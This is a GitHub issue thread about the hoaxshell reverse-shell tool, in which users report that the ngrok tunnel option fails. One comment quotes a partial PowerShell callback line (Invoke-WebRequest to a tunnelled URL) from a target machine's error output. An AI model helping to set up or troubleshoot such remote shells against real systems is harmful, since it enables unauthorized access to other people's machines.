Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Not working with ngrok #60

Open
HussHemAG opened this issue Dec 29, 2023 · 1 comment
Open

Not working with ngrok #60

HussHemAG opened this issue Dec 29, 2023 · 1 comment

Comments

@HussHemAG
Copy link

Hello, when I run the command sudo python3 hoaxshell.py -ng,
I get the following error:
[Debug] Failed to initiate tunnel. Possible cause: You have a tunnel agent session already running in the bg/fg.

@YimuQrrr
Copy link

YimuQrrr commented Aug 5, 2024

Yes, I opened a separate window to execute
ngrok http 8080

ngrok is working properly
But when I close ngrok
Execute
sudo python3 hoaxshell.py -ng

Prompt
[Debug] Failed to initiate tunnel. Possible cause: You have a tunnel agent session already running in the bg/fg.

Execute
sudo python3 hoaxshell.py -lt

It works properly

But on the target machine, it will prompt

Invoke-WebRequest :
504 Gateway Time-out
504 Gateway Time-out
nginx/1.17.9
At line:1 char:78
+ ... ttps://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/85e5c920 -He ...
+ approximately ResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants